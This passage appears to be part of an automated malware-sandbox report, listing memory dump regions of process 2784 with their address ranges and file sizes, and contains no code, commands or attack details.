                                                                          • memory/2784-74-0x000001469B140000-0x000001469B4B5000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/2784-68-0x00007FF8450A0000-0x00007FF8450CE000-memory.dmp

                                                                            Filesize

                                                                            184KB

                                                                          • memory/2784-61-0x00007FF845540000-0x00007FF84555F000-memory.dmp

                                                                            Filesize

                                                                            124KB

                                                                          • memory/2784-62-0x00007FF833890000-0x00007FF833A0D000-memory.dmp

                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/2784-66-0x00007FF84E5C0000-0x00007FF84E5CD000-memory.dmp

                                                                            Filesize

                                                                            52KB

                                                                          • memory/2784-319-0x00007FF845070000-0x00007FF845094000-memory.dmp

                                                                            Filesize

                                                                            144KB

                                                                          • memory/2784-65-0x00007FF8452F0000-0x00007FF845309000-memory.dmp

                                                                            Filesize

                                                                            100KB

                                                                          • memory/2784-79-0x00007FF832E60000-0x00007FF8332C6000-memory.dmp

                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/2784-57-0x00007FF845390000-0x00007FF8453BC000-memory.dmp

                                                                            Filesize

                                                                            176KB

                                                                          • memory/2784-58-0x00007FF8493C0000-0x00007FF8493D8000-memory.dmp

                                                                            Filesize

                                                                            96KB

                                                                          • memory/2784-32-0x00007FF845070000-0x00007FF845094000-memory.dmp

                                                                            Filesize

                                                                            144KB

                                                                          • memory/2784-96-0x00007FF82CBE0000-0x00007FF82CCF8000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                          • memory/2784-26-0x00007FF832E60000-0x00007FF8332C6000-memory.dmp

                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/2784-362-0x00007FF8493C0000-0x00007FF8493D8000-memory.dmp

                                                                            Filesize

                                                                            96KB

                                                                          • memory/2784-358-0x00007FF832AE0000-0x00007FF832E55000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/2784-357-0x00007FF844D20000-0x00007FF844DD8000-memory.dmp

                                                                            Filesize

                                                                            736KB

                                                                          • memory/2784-77-0x00007FF844D00000-0x00007FF844D15000-memory.dmp

                                                                            Filesize

                                                                            84KB

                                                                          • memory/2784-354-0x00007FF8452F0000-0x00007FF845309000-memory.dmp

                                                                            Filesize

                                                                            100KB

                                                                          • memory/2784-352-0x00007FF845540000-0x00007FF84555F000-memory.dmp

                                                                            Filesize

                                                                            124KB

                                                                          • memory/2784-347-0x00007FF832E60000-0x00007FF8332C6000-memory.dmp

                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/2784-353-0x00007FF833890000-0x00007FF833A0D000-memory.dmp

                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/2784-348-0x00007FF845070000-0x00007FF845094000-memory.dmp

                                                                            Filesize

                                                                            144KB

                                                                          • memory/2784-378-0x000001469B140000-0x000001469B4B5000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/2784-407-0x00007FF8490A0000-0x00007FF8490AD000-memory.dmp

                                                                            Filesize

                                                                            52KB

                                                                          • memory/2784-412-0x00007FF845390000-0x00007FF8453BC000-memory.dmp

                                                                            Filesize

                                                                            176KB

                                                                          • memory/2784-411-0x00007FF84E910000-0x00007FF84E91F000-memory.dmp

                                                                            Filesize

                                                                            60KB

                                                                          • memory/2784-410-0x00007FF845070000-0x00007FF845094000-memory.dmp

                                                                            Filesize

                                                                            144KB

                                                                          • memory/2784-409-0x00007FF8493C0000-0x00007FF8493D8000-memory.dmp

                                                                            Filesize

                                                                            96KB

                                                                          • memory/2784-405-0x00007FF832AE0000-0x00007FF832E55000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

                                                                          • memory/2784-408-0x00007FF82CBE0000-0x00007FF82CCF8000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                          • memory/2784-404-0x00007FF844D20000-0x00007FF844DD8000-memory.dmp

                                                                            Filesize

                                                                            736KB

                                                                          • memory/2784-403-0x00007FF8450A0000-0x00007FF8450CE000-memory.dmp

                                                                            Filesize

                                                                            184KB

                                                                          • memory/2784-402-0x00007FF84E5C0000-0x00007FF84E5CD000-memory.dmp

                                                                            Filesize

                                                                            52KB

                                                                          • memory/2784-401-0x00007FF8452F0000-0x00007FF845309000-memory.dmp

                                                                            Filesize

                                                                            100KB

                                                                          • memory/2784-400-0x00007FF833890000-0x00007FF833A0D000-memory.dmp

                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/2784-399-0x00007FF845540000-0x00007FF84555F000-memory.dmp

                                                                            Filesize

                                                                            124KB

                                                                          • memory/2784-394-0x00007FF832E60000-0x00007FF8332C6000-memory.dmp

                                                                            Filesize

                                                                            4.4MB

                                                                          • memory/2784-406-0x00007FF844D00000-0x00007FF844D15000-memory.dmp

                                                                            Filesize

                                                                            84KB